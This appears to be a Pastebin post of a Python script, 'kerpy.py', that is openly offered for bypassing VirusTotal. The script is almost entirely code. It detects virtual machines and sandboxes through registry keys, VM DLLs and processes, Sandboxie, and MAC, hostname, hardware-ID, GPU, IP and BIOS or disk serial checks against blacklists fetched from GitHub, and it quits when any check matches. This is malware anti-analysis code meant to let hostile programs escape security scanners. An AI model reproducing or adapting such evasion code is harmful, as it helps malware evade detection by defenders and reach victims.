Advertisement
FlyFar

kerpy.py - Bypass VirusTotal

Jun 28th, 2023
760
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.85 KB | Cybersecurity | 0 0
  1. import re
  2. import uuid
  3. import wmi
  4. import requests
  5. import os
  6. import ctypes
  7. import sys
  8. import subprocess
  9. import socket
  10.  
  11. def get_base_prefix_compat():
  12.     return getattr(sys, "base_prefix", None) or getattr(sys, "real_prefix", None) or sys.prefix
  13.  
  14.  
  15. def in_virtualenv():
  16.     return get_base_prefix_compat() != sys.prefix
  17.    
  18. class Kerpy:
  19.     def registry_check(self):
  20.         cmd = "REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\"
  21.         reg1 = subprocess.run(cmd + "DriverDesc", shell=True, stderr=subprocess.DEVNULL)
  22.         reg2 = subprocess.run(cmd + "ProviderName", shell=True, stderr=subprocess.DEVNULL)
  23.         if reg1.returncode == 0 and reg2.returncode == 0:
  24.             print("VMware Registry Detected")
  25.             sys.exit()
  26.  
  27.     def processes_and_files_check(self):
  28.         vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")
  29.         virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")    
  30.    
  31.         process = os.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read()
  32.         processList = []
  33.         for processNames in process.split(" "):
  34.             if ".exe" in processNames:
  35.                 processList.append(processNames.replace("K\n", "").replace("\n", ""))
  36.  
  37.         if "VMwareService.exe" in processList or "VMwareTray.exe" in processList:
  38.             print("VMwareService.exe & VMwareTray.exe process are running")
  39.             sys.exit()
  40.                            
  41.         if os.path.exists(vmware_dll):
  42.             print("Vmware DLL Detected")
  43.             sys.exit()
  44.            
  45.         if os.path.exists(virtualbox_dll):
  46.             print("VirtualBox DLL Detected")
  47.             sys.exit()
  48.        
  49.         try:
  50.             sandboxie = ctypes.cdll.LoadLibrary("SbieDll.dll")
  51.             print("Sandboxie DLL Detected")
  52.             sys.exit()
  53.         except:
  54.             pass        
  55.        
  56.         processl = requests.get("https://raw.githubusercontent.com/Lawxsz/bypass-virus-total/main/utils/process.txt").text
  57.         if processl in processList:
  58.             sys.exit()
  59.            
  60.     def mac_check(self):
  61.         mac_address = ':'.join(re.findall('..', '%012x' % uuid.getnode()))
  62.         mac_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt").text
  63.         if mac_address[:8] in mac_list:
  64.             print("VMware MAC Address Detected")
  65.             sys.exit()
  66.     def check_pc(self):
  67.      vmname = os.getlogin()
  68.      vm_name = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt").text
  69.      if vmname in vm_name:
  70.          sys.exit()
  71.      vmusername = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt").text
  72.      host_name = socket.gethostname()
  73.      if host_name in vmusername:
  74.          sys.exit()
  75.     def hwid_vm(self):
  76.      current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip()
  77.      hwid_vm = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt").text
  78.      if current_machine_id in hwid_vm:
  79.          sys.exit()
  80.     def checkgpu(self):
  81.      c = wmi.WMI()
  82.      for gpu in c.Win32_DisplayConfiguration():
  83.         GPUm = gpu.Description.strip()
  84.      gpulist = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt").text
  85.      if GPUm in gpulist:
  86.          sys.exit()
  87.     def check_ip(self):
  88.      ip_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt").text
  89.      reqip = requests.get("https://api.ipify.org/?format=json").json()
  90.      ip = reqip["ip"]
  91.      if ip in ip_list:
  92.          sys.exit()
  93.     def profiles():
  94.      machine_guid = uuid.getnode()
  95.      guid_pc = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt").text
  96.      bios_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BIOS_Serial_List.txt").text
  97.      baseboard_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BaseBoard_Serial_List.txt").text
  98.      serial_disk = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/DiskDrive_Serial_List.txt").text
  99.      if machine_guid in guid_pc:
  100.          sys.exit()
  101.      w = wmi.WMI()
  102.      for bios in w.Win32_BIOS():
  103.       bios_check = bios.SerialNumber    
  104.      if bios_check in bios_guid:
  105.          sys.exit()
  106.      for baseboard in w.Win32_BaseBoard():
  107.          base_check = baseboard.SerialNumber
  108.      if base_check in baseboard_guid:
  109.          sys.exit()
  110.      for disk in w.Win32_DiskDrive():
  111.       disk_serial = disk.SerialNumber
  112.      if disk_serial in serial_disk:
  113.          sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement